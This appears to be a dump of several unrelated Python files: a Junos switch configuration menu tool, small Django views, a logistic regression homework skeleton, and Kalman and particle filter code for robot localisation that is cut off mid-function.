fpc_num = len(lan_router[hostname]['interfaces']['physical'].keys())
# Check if there are at least 1 chassis
if(fpc_num):
# Create option list
option = []
for key in lan_router[hostname]['interfaces']['physical'].keys():
model = lan_router[hostname]['interfaces']['physical'][key]['chassis_mod']
option.append("Member " + str(key) + " (" + model + ")")
option.append("Go Back")
# Display the chassis members and ask which one to remove
question = "Select chassis to delete"
selection = ""
print "Length: " + str(len(option))
while selection != len(option)-1:
selection = getOptionTRAnswer(question, option)
if selection > 0 and selection < len(option)-1:
delSystemChassis(hostname, selection)
break
# Delete specified chassis from stack
def delSystemChassis(hostname, fpc):
try:
del lan_router[hostname]['interfaces']['physical'][fpc]
except Exception as exception:
print type(exception)
print "Error deleteing FPC " + str(fpc)
# Returns True or False if hostname is already in use
def isUniqueHostname(hostname):
isUnique = True
for host in lan_router.keys():
if host == hostname:
isUnique = False
print "ERROR: This hostname is already used, please create a unique hostname."
return isUnique
# Checks VC stack combinations, be sure its valid
def checkStackValid(hostname, modelAdd):
ex4245_exists = False
ex4300_exists = False
ex4600_exists = False
# Check if interfaces have already been created
if lan_router[hostname].has_key('interfaces'):
fpc_list = lan_router[hostname]['interfaces']['physical']
# Determine what types of devices are in this stack already
for fpc in fpc_list:
model = lan_router[hostname]['interfaces']['physical'][fpc]['fpc_mod']
matchEX4245 = re.match( r'^EX4[2,5][0-9]0', model )
matchEX4300 = re.match( r'^EX4300', model )
matchEX4600 = re.match( r'^EX4600', model )
if matchEX4245:
ex4245_exists = True
elif matchEX4300:
ex4300_exists = True
elif matchEX4600:
ex4600_exists = True
# Check conditions to determine if new switch can be added to stack
if re.match( r'^EX4[2,5][0-9]0', modelAdd ):
if ex4300_exists or ex4600_exists:
print "Model " + modelAdd + " and EX4300/EX4600 cannot be in the same stack."
return False
elif re.match( r'^EX4300', modelAdd ):
if ex4245_exists:
print "Model " + modelAdd + " and EX4200/EX4500/EX4550 cannot be in the same stack."
return False
elif ex4600_exists:
print "WARNING: EX4600 must be the RE in a mixed-mode stack if it includes" + modelAdd + "s."
elif re.match( r'^EX4600', modelAdd ):
if ex4245_exists:
print "Model " + modelAdd + " and EX4200/EX4500/EX4550 cannot be in the same stack."
return False
elif ex4300_exists:
print "WARNING: " + modelAdd + " must be the RE in a mixed-mode stack if it includes EX4300s."
return True
#############################################################
# =================== DISPLAY FUNCTIONS =================== #
#############################################################
# Display interfaces
def displayInterfaces(hostname):
# Make sure hostname
if hostname in lan_router.keys():
# Option for displaying Virtual Chassis Interfaces
print "\n" + "=" * 95
print "Hostname: " + hostname
if lan_router[hostname]['is_vc']:
print "System Type: Virtual Chassis"
for fpc in lan_router[hostname]['interfaces']['physical'].keys():
print "\n" + "=" * 95
print "Member: " + str(fpc)
print "Model\t\t\tFPC\tPIC\tPorts\tType\t\tSpeed\t\tPoE\tVCP"
print "-" * 95
printInterfaces(hostname, fpc, True)
# Option for displaying Standalone Chassis Interfaces
elif lan_router[hostname]['chassis_type'] == 'stackable':
for fpc in lan_router[hostname]['interfaces']['physical'].keys():
model = lan_router[hostname]['chassis_mod']
print "System Type: " + model
print "\n" + "=" * 95
print "Model\t\t\tFPC\tPIC\tPorts\tType\t\tSpeed\t\tPoE\tVCP"
print "-" * 95
printInterfaces(hostname, fpc, False)
# Option for displaying Modular Chassis Intefaces
else:
print "System Type: " + lan_router[hostname]['chassis_mod']
for fpc in lan_router[hostname]['interfaces']['physical'].keys():
print "\n" + "=" * 95
print "Slot: " + str(fpc)
print "Model\t\t\tFPC\tPIC\tPorts\tType\t\tSpeed\t\tPoE\tVCP"
print "-" * 95
printInterfaces(hostname, fpc, False)
print "\n" + "=" * 95
displayChassisHardware(hostname, "Both")
print "\n" + "=" * 95
# Print WAN info
elif hostname in wan_router.keys():
print "\n" + "=" * 95
print "Hostname: " + hostname
print "System type: wan"
print "Preferred Egress: " + str(wan_router[hostname]['pref_egress'])
print "\n" + "=" * 95
print "Ports"
print "-" * 95
for wanintf in wan_router[hostname]['intf_name']:
print wanintf
print "\n" + "=" * 95
# Print error about invalid hostname
else:
print "Invalid Host: " + hostname
# Generic interface print function
def printInterfaces(hostname, fpc, is_vc):
# This will print out the primary built-in ports for the chassis
pic = 0
# A stackable device
if lan_router[hostname]['chassis_type'] == 'stackable':
# Virtual Chassis system
if is_vc:
model = lan_router[hostname]['interfaces']['physical'][fpc]['fpc_mod']
# Single Chassis system
else:
model = lan_router[hostname]['chassis_mod']
# Common output
ports = system_model[model]['port_num']
poe = system_model[model]['poe_capable']
vcp = system_model[model]['vcp_capable']
type_list = ''
speed_list = ''
type_len = len(system_model[model]['intf_type'])
speed_len = len(system_model[model]['speed'])
for intftype in system_model[model]['intf_type']:
type_list += intftype
if type_len > 1:
type_list += "|"
type_len -= 1
for speed in system_model[model]['speed']:
speed_list += speed
if speed_len > 1:
speed_list += "|"
speed_len -= 1
# A modular device
else:
model = lan_router[hostname]['interfaces']['physical'][fpc]['fpc_mod']
ports = modular_model[model]['port_num']
poe = modular_model[model]['poe_capable']
vcp = modular_model[model]['vcp_capable']
type_list = ''
speed_list = ''
type_len = len(modular_model[model]['intf_type'])
speed_len = len(modular_model[model]['speed'])
for intftype in modular_model[model]['intf_type']:
type_list += intftype
if type_len > 1:
type_list += "|"
type_len -= 1
for speed in modular_model[model]['speed']:
speed_list += speed
if speed_len > 1:
speed_list += "|"
speed_len -= 1
# Print the line
print model + str(useTab(model, 3)) + str(fpc) + "\t" + str(pic) + "\t" + str(ports) + "\t" + type_list + str(useTab(type_list, 2)) + speed_list + str(useTab(speed_list, 2)) + str(poe) + "\t" + str(vcp)
if lan_router[hostname]['chassis_type'] == 'stackable':
# This will handle displaying any expansion modules
for pic in lan_router[hostname]['interfaces']['physical'][fpc].keys():
# Make sure we're getting a PIC key
if isinstance(pic,int):
if pic != 0:
model = lan_router[hostname]['interfaces']['physical'][fpc][pic]['module_mod']
# Common Terms
ports = modular_model[model]['port_num']
vcp = modular_model[model]['vcp_capable']
type_list = ''
speed_list = ''
type_len = len(modular_model[model]['intf_type'])
speed_len = len(modular_model[model]['speed'])
for intftype in modular_model[model]['intf_type']:
type_list += intftype
if type_len > 1:
type_list += "|"
type_len -= 1
for speed in modular_model[model]['speed']:
speed_list += speed
if speed_len > 1:
speed_list += "|"
speed_len -= 1
print model + str(useTab(model, 3)) + str(fpc) + "\t" + str(pic) + "\t" + str(ports) + "\t" + type_list + str(useTab(type_list, 2)) + speed_list + str(useTab(speed_list, 2)) + str(poe) + "\t" + str(vcp)
# Check if aux exists
elif pic == 0 and lan_router[hostname]['interfaces']['physical'][fpc][pic]['has_aux']:
model = lan_router[hostname]['interfaces']['physical'][fpc][pic]['aux_mod']
# Common Terms
ports = modular_model[model]['port_num']
vcp = modular_model[model]['vcp_capable']
type_list = ''
speed_list = ''
type_len = len(modular_model[model]['intf_type'])
speed_len = len(modular_model[model]['speed'])
for intftype in modular_model[model]['intf_type']:
type_list += intftype
if type_len > 1:
type_list += "|"
type_len -= 1
for speed in modular_model[model]['speed']:
speed_list += speed
if speed_len > 1:
speed_list += "|"
speed_len -= 1
print model + str(useTab(model, 3)) + str(fpc) + "\t" + str(pic) + "\t" + str(ports) + "\t" + type_list + str(useTab(type_list, 2)) + speed_list + str(useTab(speed_list, 2)) + str(poe) + "\t" + str(vcp)
# Compute Tabs
def useTab(mystr, menuTab):
tabSpc = 8
useTabs = 0
length = len(mystr)
try:
useTabs = math.ceil(((menuTab * tabSpc) - length) / 8.0)
except:
print "ERROR: Failure computing tabs"
else:
prtTabs = '\t' * int(useTabs)
return prtTabs
# Create Tabs
def myTab(myStr):
myTabbedStr = ""
if len(myStr) < 8: myTabbedStr = myStr + "\t\t"
elif len(myStr) < 16: myTabbedStr = myStr + "\t"
else: myTabbedStr = myStr
return myTabbedStr
# Display basic chassis information
def displayChassisBasic():
# Check if any hosts exist in dictionary
if lan_router.keys() or wan_router.keys():
print "\n" + "="*63
print "Hostname\tSystem Type\tModel\t\tVirtual Chassis"
print "-"*63
for hostname in sorted(wan_router.keys()):
print myTab(hostname) + myTab("wan")
for hostname in sorted(lan_router.keys()):
if lan_router[hostname]['chassis_type'] == 'stackable':
print myTab(hostname) + myTab(lan_router[hostname]['system_type']) + myTab(lan_router[hostname]['chassis_mod']) + str(lan_router[hostname]['is_vc'])
else:
print myTab(hostname) + myTab(lan_router[hostname]['system_type']) + myTab(lan_router[hostname]['chassis_mod']) + 'False'
else:
print "\n--- NO CHASSIS ---\n"
print "\n" + "="*63
####################################
# ============= MAIN ============= #
####################################
# Main Function
def main():
print("\nWelcome to Junos Configuration Creation Tool \n")
mainMenu()
if __name__ == '__main__':
main() |
991,673 | 091f2e6b3e72e8223877e7c9ce1ff152f7db37e9 | from django.http import JsonResponse
from rest_framework.decorators import api_view, parser_classes
from rest_framework.parsers import JSONParser
from admin.myRNN.models import myRNN
@api_view(['GET'])
@parser_classes([JSONParser])
def ram_price(request):
myRNN().ram_price()
return JsonResponse({'RNN ram_price': 'Success'})
@api_view(['GET'])
@parser_classes([JSONParser])
def kia_predict(request):
myRNN().kia_predict()
return JsonResponse({'RNN kia_predict': 'Success'}) |
991,674 | 7923825f11f6c69dba506465dd1b26ac3e2fb4dd | def cube_volume(x):
return x*x*x |
991,675 | bb46b8d86837301eadcceac5a1ee0c8167db8365 | from django.urls import path
from .views import SitesView
urlpatterns = [
path('/', SitesView.as_view())
]
|
991,676 | cc93a47fd2a3d0d39c1ef2c05bcd70bbf8a56b6f | from numpy import *
from plotBoundary import *
# import your LR training code
# parameters
data = 'ls'
print '======Training======'
# load data from csv files
train = loadtxt('data/data_'+name+'_train.csv')
X = train[:,0:2]
Y = train[:,2:3]
# Carry out training.
### TODO ###
# Define the predictLR(x) function, which uses trained parameters
### TODO ###
# plot training results
plotDecisionBoundary(X, Y, predictLR, [0.5], title = 'LR Train')
print '======Validation======'
# load data from csv files
validate = loadtxt('data/data_'+data+'_validate.csv')
X = validate[:,0:2]
Y = validate[:,2:3]
# plot validation results
plotDecisionBoundary(X, Y, predictLR, [0.5], title = 'LR Validate')
|
991,677 | 02642d35a5777f1c88583753a413c3531e33ab50 | import math as m
import numpy as np
import pylab
import sympy as sp
from numpy import reshape as rs
from numpy import matrix as mat
from matplotlib.patches import Ellipse
def eigsorted(cov):
vals, vecs = np.linalg.eigh(cov)
order = vals.argsort()[::-1]
return vals[order], vecs[:,order]
class robot(object):
t0 = 0
state_dim = 3
meas_dim = 3
X0 = np.array([[0],[0],[m.pi/2]])
P0 = np.matrix([[.1,0,0],[0,.1,0],[0,0,.4]])
h = 1
tf = 100
G = np.matrix([[h,0,0],[0,h,0],[0,0,h]])
M = np.matrix([[1,0,0],[0,1,0],[0,0,0]])
Q = (1.0/h)*np.matrix([[.01,0,0],[0,.01,0],[0,0,0.2]])
R = (1.0/h)*np.matrix([[.2,0,0],[0,0.2,0],[0,0,0]])
def kinematics(self,t):
x1, x2, x3 = sp.symbols('x1 x2 x3')
v = abs(m.sin(t))
if t<=50:
w = 0.1
elif t<=80 and t>50:
w = 0.2
elif t>80:
w = -0.1
F = sp.Matrix([x1 + v*sp.cos(x3)*self.h, x2 + v*sp.sin(x3)*self.h, x3 + w*self.h])
return F, x1, x2, x3
def jacobian(self,X,t):
F, x1, x2, x3 = self.kinematics(t)
J = F.jacobian([x1,x2,x3])
return J.subs([(x1,X[0]),(x2,X[1]),(x3,X[2])])
def state_propagate(self,X0, Q,t):
F, x1, x2, x3 = self.kinematics(t)
w = np.random.multivariate_normal(np.zeros((self.state_dim,)),Q)
w = mat(w.reshape((self.state_dim,1))).astype(np.float64)
X = np.reshape(F.subs([(x1,X0[0]),(x2,X0[1]),(x3,X0[2])]) + np.matmul(self.G,w),(self.state_dim,))
return X
def lin_obs_model():
x1, x2, x3 = sp.symbols('x1 x2 x3')
hx = sp.Matrix([x1,x2,0])
return hx, x1, x2, x3
def observation(M,X, R):
hx, x1, x2, x3 = lin_obs_model()
nu = np.random.multivariate_normal(np.zeros((3,)),R)
nu = mat(nu.reshape((3,1))).astype(np.float64)
Y = hx.subs([(x1,X[0]),(x2,X[1]),(x3,X[2])]) + np.matmul(M,nu)
return np.matrix(Y).astype(np.float64)
def obs_jacobian(X):
hx, x1, x2, x3 = lin_obs_model()
H = hx.jacobian([x1,x2,x3])
return H.subs([(x1,X[0]),(x2,X[1]),(x3,X[2])])
def EKF(system, X_prev_est, X_prev_act, P_prev,t):
#prediction steps
P_prev = mat(P_prev.reshape((3,3))).astype(np.float64)
X_prior = system.state_propagate(X_prev_est,np.zeros((system.state_dim,system.state_dim)),t)
print "X_prior", X_prior
A = np.matrix(system.jacobian(X_prev_est,t)).astype(np.float64)
print "A:",A
P_prior = np.matmul(np.matmul(A,P_prev),A.T) + np.matmul(np.matmul(system.G,system.Q),system.G.T)
print "P prior:",P_prior#, " Pinv:", P_prior.I
X_act = np.reshape(system.state_propagate(X_prev_act,system.Q,t),(system.state_dim,))
#
# if t == 5:
#
# vals, vecs = eigsorted(P_prior[0:2,0:2])
# theta = np.degrees(np.arctan2(*vecs[:,0][::-1]))
# ax = pylab.gca()
# for sigma in xrange(1, 4):
# w, h = 2 * sigma * np.sqrt(vals)
# ell = Ellipse(xy=X_prior[0:2],width=w, height=h,angle=theta,fill=None,color='r')
# ell.set_facecolor('none')
# ax.add_artist(ell)
# #ellipse = Ellipse(xy=X_prior[0:2],width=lambda_*2, height=ell_radius_y*2,fill=None,color='r')
#
#
# pylab.plot(X_prior[0],X_prior[1],'ro',markersize=2,linewidth=1,label='predicted EKF')
# pylab.plot(X_act[0],X_act[1],'bo',markersize=2,linewidth=1,label='Actual')
# pylab.legend()
# pylab.xlabel('x')
# pylab.ylabel('y')
# pylab.xlim(-7,7)
# pylab.ylim(1,8)
# #pylab.show()
# pylab.savefig('/home/naveed/Dropbox/Sem 3/Aero 626/HW3/'+'2_1_EKF_t5.pdf', format='pdf',bbox_inches='tight',pad_inches = .06)
if t%5 == 0:
#update
Y_act = observation(system.M,X_act, system.R)
##print "Yact:",Y_act
Y_est = observation(system.M,X_prior,np.zeros((system.meas_dim,system.meas_dim)))
#print "Y est:",Y_est
H = np.matrix(obs_jacobian(X_prior)).astype(np.float64)
print "H:",H
S = np.matmul(np.matmul(H,P_prior),H.T) + system.R
#since S is singular and only 1 measurement is received
#K_gain = np.matmul(np.matmul(P_prior,H),S.I)
K_gain = np.zeros((system.state_dim,system.state_dim))
if S[1,1] == 0 :
S[1,1] = 10**(-9)#adding to make it non-singular
if S[2,2] == 0:
S[2,2] = 10**(-9)
#K_gain[0,0] = np.matmul(P_prior[0,:],H[:,0])/S[0,0]
#K_gain[1,0] = np.matmul(P_prior[1,:],H[:,0])/S[0,0]
#K_gain[2,0] = np.matmul(P_prior[2,:],H[:,0])/S[0,0]
print "S:",S.I
K_gain = np.matmul(np.matmul(P_prior,H.T),S.I)
print "K:",K_gain
print "H.TSI", np.matmul(H.T,S.I)
X_est = np.reshape(X_prior,(3,1)) + np.matmul(K_gain, Y_act - Y_est)
print "X est:", X_est
print "Correction:", np.matmul(K_gain, Y_act - Y_est)
X_est = np.reshape(X_est,(3,))
print "I -KH",np.eye(3) - np.matmul(K_gain,H)
P_post = np.matmul(np.eye(3) - np.matmul(K_gain,H), P_prior)
print "P_post:", P_post
# if t == 5:
#
# vals, vecs = eigsorted(P_post[0:2,0:2])
# theta = np.degrees(np.arctan2(*vecs[:,0][::-1]))
# ax = pylab.gca()
# for sigma in xrange(1, 4):
# w, h = 2 * sigma * np.sqrt(vals)
# ell = Ellipse(xy=(X_est[0,0],X_est[0,1]),width=w, height=h,angle=theta,fill=None,color='r')
# ell.set_facecolor('none')
# ax.add_artist(ell)
#
# pylab.plot(X_est[0,0],X_est[0,1],'ro',markersize=2,linewidth=1,label='updated EKF')
# pylab.plot(X_act[0],X_act[1],'bo',markersize=2,linewidth=1,label='Actual')
# pylab.legend()
# pylab.xlabel('x')
# pylab.ylabel('y')
# pylab.xlim(-7,7)
# pylab.ylim(1,8)
# #pylab.show()
# pylab.savefig('/home/naveed/Dropbox/Sem 3/Aero 626/HW3/'+'2_1_EKF_t5_updated.pdf', format='pdf',bbox_inches='tight',pad_inches = .06)
return X_est, X_act, P_post.reshape((system.state_dim**2,))
else:
return X_prior.reshape((system.state_dim,)), X_act, P_prior.reshape((system.state_dim**2,))
def UKF(system, X_prev_est, X_prev_act, P_prev,t):
P_prev = mat(P_prev.reshape((3,3))).astype(np.float64)
print "P_prev:",P_prev
X_prev_est = np.reshape(X_prev_est,(3,1))
n = 3
X_sigma = np.zeros((n,2*n+1))
W = np.zeros(2*n+1)
#choosing sigma points and weights
X_sigma[:,0] = np.reshape(X_prev_est,(3,))
W[0] = 0.1
S = np.linalg.cholesky(P_prev)
for i in range(1,n+1,1):
X_sigma[:,i] = np.reshape(X_prev_est + np.sqrt(n/(1-W[0]))*S[:,i-1],(n,))
X_sigma[:,i+n] = np.reshape(X_prev_est - np.sqrt(n/(1-W[0]))*S[:,i-1],(n,))
W[i] = (1 - W[0])/(2*n)
W[i+n] = (1 - W[0])/(2*n)
#print "X_sigma:",X_sigma
#print "W:", W
#prediction
X_prior = np.zeros(3)
#calculating X_prior
for i in range(2*n+1):
X_sigma[:,i] = np.reshape(system.state_propagate(X_sigma[:,i],np.zeros((system.state_dim,system.state_dim)),t),(n,))
X_prior = X_prior + W[i]*X_sigma[:,i]
P_prior = np.zeros((3,3))
#calculating P_prior
for i in range(2*n+1):
X_error = np.matrix(X_sigma[:,i] - X_prior).astype(np.float64)
P_prior = P_prior + W[i]*np.matmul(X_error.T,X_error)
P_prior = P_prior + np.matmul(np.matmul(system.G,system.Q),system.G.T)
print "X_prior:",X_prior
print "P_prior:",P_prior, " Eigen:",np.linalg.eig(P_prior)
#update
X_act = np.reshape(system.state_propagate(X_prev_act,system.Q,t),(3,))
# if t == 5:
#
# vals, vecs = eigsorted(P_prior[0:2,0:2])
# theta = np.degrees(np.arctan2(*vecs[:,0][::-1]))
# ax = pylab.gca()
# for sigma in xrange(1, 4):
# w, h = 2 * sigma * np.sqrt(vals)
# ell = Ellipse(xy=X_prior[0:2],width=w, height=h,angle=theta,fill=None,color='r')
# ell.set_facecolor('none')
# ax.add_artist(ell)
# #ellipse = Ellipse(xy=X_prior[0:2],width=lambda_*2, height=ell_radius_y*2,fill=None,color='r')
#
#
# pylab.plot(X_prior[0],X_prior[1],'ro',markersize=2,linewidth=1,label='predicted UKF')
# pylab.plot(X_act[0],X_act[1],'bo',markersize=2,linewidth=1,label='Actual')
# pylab.legend()
# pylab.xlabel('x')
# pylab.ylabel('y')
# pylab.xlim(-7,7)
# pylab.ylim(1,8)
# #pylab.show()
# pylab.savefig('/home/naveed/Dropbox/Sem 3/Aero 626/HW3/'+'2_1_UKF_t5.pdf', format='pdf',bbox_inches='tight',pad_inches = .06)
if t%5 == 0:
Y_act = observation(system.M,X_act, system.R)
#passing sigma points through observation
Y_est_sigma = np.zeros((n,2*n+1))
Y_est = np.zeros(3)
for i in range(2*n+1):
Y_est_sigma[:,i] = np.reshape(observation(system.M,X_sigma[:,i], np.zeros((system.meas_dim,system.meas_dim))),(3,))
Y_est = Y_est + W[i]*Y_est_sigma[:,i]
print "Y_est:",Y_est, " Y_act:", Y_act
#calculating Pyy
P_yy = np.zeros((3,3))
for i in range(2*n+1):
Y_error = np.matrix(Y_est_sigma[:,i] - Y_est).astype(np.float64)
P_yy = P_yy + W[i]*np.matmul(Y_error.T,Y_error)
P_yy = P_yy + system.R
#calculating Pxy
P_xy = np.zeros((3,3))
for i in range(2*n+1):
X_error = np.matrix(X_sigma[:,i] - X_prior).astype(np.float64)
Y_error = np.matrix(Y_est_sigma[:,i] - Y_est).astype(np.float64)
P_xy = P_xy + W[i]*np.matmul(X_error.T,Y_error)
#Kalman gain
K_gain = np.zeros((3,3))
if P_yy[1,1] == 0:
P_yy[1,1] = 10**(-6)
if P_yy[2,2] == 0:
P_yy[2,2] = 10**(-6)
print "Pxy:",P_xy
print "Pyy:",P_yy
K_gain = np.matmul(P_xy,P_yy.I)
print "K-gain",K_gain
#state update
X_est = np.reshape(X_prior,(3,1)) + np.matmul(K_gain, Y_act - np.reshape(Y_est,(3,1)))
P_post = P_prior - np.matmul(np.matmul(K_gain,P_yy),K_gain.T)
#print "Cov corr:",np.matmul(np.matmul(K_gain,P_yy),K_gain.T)
print "X_est:",X_est, "X_act:",X_act
print "P_post:",P_post," Eigen:",np.linalg.eig(P_post)
X_est = np.reshape(X_est,(3,))
X_act = np.reshape(X_act,(3,))
# if t == 5:
#
# vals, vecs = eigsorted(P_post[0:2,0:2])
# theta = np.degrees(np.arctan2(*vecs[:,0][::-1]))
# ax = pylab.gca()
# for sigma in xrange(1, 4):
# w, h = 2 * sigma * np.sqrt(vals)
# ell = Ellipse(xy=(X_est[0,0],X_est[0,1]),width=w, height=h,angle=theta,fill=None,color='r')
# ell.set_facecolor('none')
# ax.add_artist(ell)
#
# pylab.plot(X_est[0,0],X_est[0,1],'ro',markersize=2,linewidth=1,label='updated UKF')
# pylab.plot(X_act[0],X_act[1],'bo',markersize=2,linewidth=1,label='Actual')
# pylab.legend()
# pylab.xlabel('x')
# pylab.ylabel('y')
# pylab.xlim(-7,7)
# pylab.ylim(1,8)
# #pylab.show()
# pylab.savefig('/home/naveed/Dropbox/Sem 3/Aero 626/HW3/'+'2_1_UKF_t5_updated.pdf', format='pdf',bbox_inches='tight',pad_inches = .06)
return X_est,X_act,P_post.reshape((9,))
else:
return X_prior.reshape((system.state_dim,)), X_act, P_prior.reshape((system.state_dim**2,))
def EnKF(system, n):
X_est = np.zeros((system.X0.shape[0],n+1))
X_act = np.zeros((system.X0.shape[0],n+1))
X_est[:,0] = np.reshape(system.X0,(system.X0.shape[0],))
X_act[:,0] = np.reshape(system.X0,(system.X0.shape[0],))
P = np.zeros((system.X0.shape[0]*system.X0.shape[0],n+1))
P[:,0] = system.P0.reshape((9,))
N = 100 #ensemble size
X_en = np.random.multivariate_normal(np.reshape(system.X0,(3,)),system.P0,N) #en - ensemble
X_en = X_en.T #3x100 every column is a random vector.
np.random.seed(1)
#print "X_ensemble:",X_en
Y_en = np.zeros((3,N))
#fig, ax = pylab.subplots(1,2)
for t in range(n):
X_en = np.array(X_en) #matrix to array (after 1st iter)
#print "X_en:", X_en
"""
#Visualising particles
ax[0].plot(t*np.ones((N,1)), X_en[0,:],'ro',markersize=2,linewidth=2)
ax[0].plot(t, X_act[0,t],'bo',markersize=5,linewidth=2)
ax[0].legend()
#ax[0].set_xlim(-0.1,0.7)
ax[1].plot(t*np.ones((N,1)), X_en[1,:],'ro',markersize=2,linewidth=2)
ax[1].plot(t, X_act[1,t],'bo',markersize=5,linewidth=2)
ax[1].legend()
#ax[1].set_xlim(-0.1,0.7)
"""
X_act[:,t+1] = np.reshape(system.state_propagate(X_act[:,t],system.Q,t+1),(3,))
Y_act = observation(system.M,X_act[:,t+1], system.R)
for i in range(N):
X_en[:,i] = system.state_propagate(X_en[:,i],system.Q,t+1).reshape((3,)) #propagate dynamics of ensemble
Y_en[:,i] = (Y_act + np.random.multivariate_normal(np.zeros(3),system.R,1).reshape((3,1))).reshape((3,)) #perturb observations.
#print "X_en predict:",X_en
#calculating prior covariance from ensemble
X_en_bar = np.matmul(mat(X_en).astype(np.float64),(1.0/N)*np.ones((N,N)))
#print "X_en_bar:", X_en_bar[:,0]
X_err = mat(X_en - X_en_bar).astype(np.float64)
P_prior = (1.0/(N-1))*np.matmul(X_err,X_err.T)
# if t+1 == 5:
# X_prior = X_en_bar[:,0]
# vals, vecs = eigsorted(P_prior[0:2,0:2])
# theta = np.degrees(np.arctan2(*vecs[:,0][::-1]))
# ax = pylab.gca()
# for sigma in xrange(1, 4):
# w, h = 2 * sigma * np.sqrt(vals)
# ell = Ellipse(xy=X_prior[0:2],width=w, height=h,angle=theta,fill=None,color='r')
# ell.set_facecolor('none')
# ax.add_artist(ell)
# #ellipse = Ellipse(xy=X_prior[0:2],width=lambda_*2, height=ell_radius_y*2,fill=None,color='r')
#
#
# pylab.plot(X_prior[0],X_prior[1],'ro',markersize=2,linewidth=1,label='predicted EnKF')
# pylab.plot(X_act[0,t+1],X_act[1,t+1],'bo',markersize=2,linewidth=1,label='Actual')
# pylab.legend()
# pylab.xlabel('x')
# pylab.ylabel('y')
# pylab.xlim(-7,7)
#
# pylab.ylim(-2,6)
# #pylab.show()
# pylab.savefig('/home/naveed/Dropbox/Sem 3/Aero 626/HW3/'+'2_1_EnKF_t5.pdf', format='pdf',bbox_inches='tight',pad_inches = .06)
if (t+1)%5 == 0:
#calculating measurement covariance from ensemble
Y_err = Y_en - np.matmul(Y_act,np.ones((1,N)))
Cov_e = (1.0/(N-1))*np.matmul(Y_err,Y_err.T)
#Kalman update
H = np.matrix(obs_jacobian(np.mean(X_en,axis=1))).astype(np.float64)
S = np.matmul(np.matmul(H,P_prior),H.T) + Cov_e
if S[1,1] == 0.0:
S[1,1] = 10**(-9)
if S[2,2] == 0.0:
S[2,2] = 10**(-9)
#print "S:",S
K_gain = np.matmul(np.matmul(P_prior,H.T),S.I)
X_en = X_en + np.matmul(K_gain,Y_en - np.matmul(H,X_en))
#calculating post covariance from ensemble
X_en_bar = np.matmul(mat(X_en).astype(np.float64),(1.0/N)*np.ones((N,N)))
X_err = mat(X_en - X_en_bar).astype(np.float64)
P_post = (1.0/(N-1))*np.matmul(X_err,X_err.T)
X_est[:,t+1] = np.mean(X_en,axis=1).reshape((3,))
P[:,t+1] = P_post.reshape((9,))
# if t+1 == 5:
#
# vals, vecs = eigsorted(P_post[0:2,0:2])
# theta = np.degrees(np.arctan2(*vecs[:,0][::-1]))
# ax = pylab.gca()
# for sigma in xrange(1, 4):
# w, h = 2 * sigma * np.sqrt(vals)
# ell = Ellipse(xy=X_est[0:2,t+1],width=w, height=h,angle=theta,fill=None,color='r')
# ell.set_facecolor('none')
# ax.add_artist(ell)
# #ellipse = Ellipse(xy=X_prior[0:2],width=lambda_*2, height=ell_radius_y*2,fill=None,color='r')
#
#
# pylab.plot(X_est[0,t+1],X_est[1,t+1],'ro',markersize=2,linewidth=1,label='updated EnKF')
# pylab.plot(X_act[0,t+1],X_act[1,t+1],'bo',markersize=2,linewidth=1,label='Actual')
# pylab.legend()
# pylab.xlabel('x')
# pylab.ylabel('y')
# pylab.xlim(-7,7)
#
# pylab.ylim(-2,6)
# #pylab.show()
# pylab.savefig('/home/naveed/Dropbox/Sem 3/Aero 626/HW3/'+'2_1_EnKF_t5_updated.pdf', format='pdf',bbox_inches='tight',pad_inches = .06)
else:
X_est[:,t+1] = np.mean(X_en,axis=1).reshape((3,))
P[:,t+1] = P_prior.reshape((9,))
#print "X_en update:",X_en
# print "X_mean:",np.mean(X_en,axis=1)
# print "P_prior:", P_prior
# print "P post:", P_post
# print "Y_act:",Y_act
# print "Cov_e:", Cov_e
# print "K_gain:",K_gain
# print "X_est:",X_est[:,t+1]
#pylab.show()
#pylab.savefig('/home/naveed/Dropbox/Sem 3/Aero 626/HW3/'+'2_1_EnKF_ens.pdf', format='pdf',bbox_inches='tight',pad_inches = .06)
return X_est, X_act, P
def ParticleF(system,n):
X_est = np.zeros((system.X0.shape[0],n+1))
X_act = np.zeros((system.X0.shape[0],n+1))
X_est[:,0] = np.reshape(system.X0,(system.X0.shape[0],))
X_act[:,0] = np.reshape(system.X0,(system.X0.shape[0],))
P = np.zeros((system.X0.shape[0]*system.X0.shape[0],n+1))
P[:,0] = system.P0.reshape((9,))
#Sampling
N = 200#no. of particles
X_hyps = np.random.multivariate_normal(np.reshape(system.X0,(3,)),system.P0,N) #sampling from prior
X_hyps = X_hyps.T
#print "Hyposthesis:",X_hyps
#w = (1.0/N)*np.ones(N) #weights
w = np.zeros(N)
for i in range(N):
X_err = mat((X_hyps[:,i] - rs(system.X0,(system.state_dim,))).reshape((system.state_dim,1))).astype(np.float64)
w[i] = m.exp(-0.5*np.matmul(np.matmul(X_err.T,system.P0.I),X_err))/(m.sqrt((2*m.pi)**system.state_dim)*np.sqrt(np.linalg.det(system.P0))) #calculating l
w = np.true_divide(w,np.sum(w))
np.random.seed(1)
"""
#Visualising particles
pylab.plot(X_hyps[1,:],w,'ro',markersize=2,linewidth=1,label='Particles x1')
pylab.legend()
pylab.show()
"""
for t in range(n):
X_act[:,t+1] = np.reshape(system.state_propagate(X_act[:,t],system.Q,t+1),(3,))
Y_act = observation(system.M,X_act[:,t+1], system.R)
for i in range(N):
X_hyps[:,i] = system.state_propagate(X_hyps[:,i],system.Q,t+1).reshape((3,)) #propagate dynamics of particles
if (t+1)%5 == 0:
observ_err = Y_act - observation(system.M,X_hyps[:,i],np.zeros((system.meas_dim,system.meas_dim))) #observation error
if system.R[2,2] == 0:
system.R[2,2] = 10**(-6)
#likelihood
w[i] = w[i]*m.exp(-0.5*np.matmul(np.matmul(observ_err.T,system.R.I),observ_err))/(m.sqrt((2*m.pi)**system.meas_dim)*np.sqrt(np.linalg.det(system.R))) #calculating likelihood and updating weight
w = np.true_divide(w,np.sum(w)) #normalising weights
# pylab.figure(1)
# pylab.plot(X_hyps[1,:],w,'ro',markersize=2,linewidth=1,label='Particles x1')
# pylab.legend()
#plot particles
# if (t+1) == 5:
#
# pylab.plot(X_hyps[0,:],X_hyps[1,:],'ro',markersize=2,linewidth=1,label='Predicted PF')
# pylab.plot(X_act[0,t+1],X_act[1,t+1],'bo',markersize=2,linewidth=1,label='Actual')
# pylab.legend()
# pylab.xlabel('x')
# pylab.ylabel('y')
# #pylab.show()
# pylab.savefig('/home/naveed/Dropbox/Sem 3/Aero 626/HW3/'+'2_1_PF_t5.pdf', format='pdf',bbox_inches='tight',pad_inches = .06)
#resampling
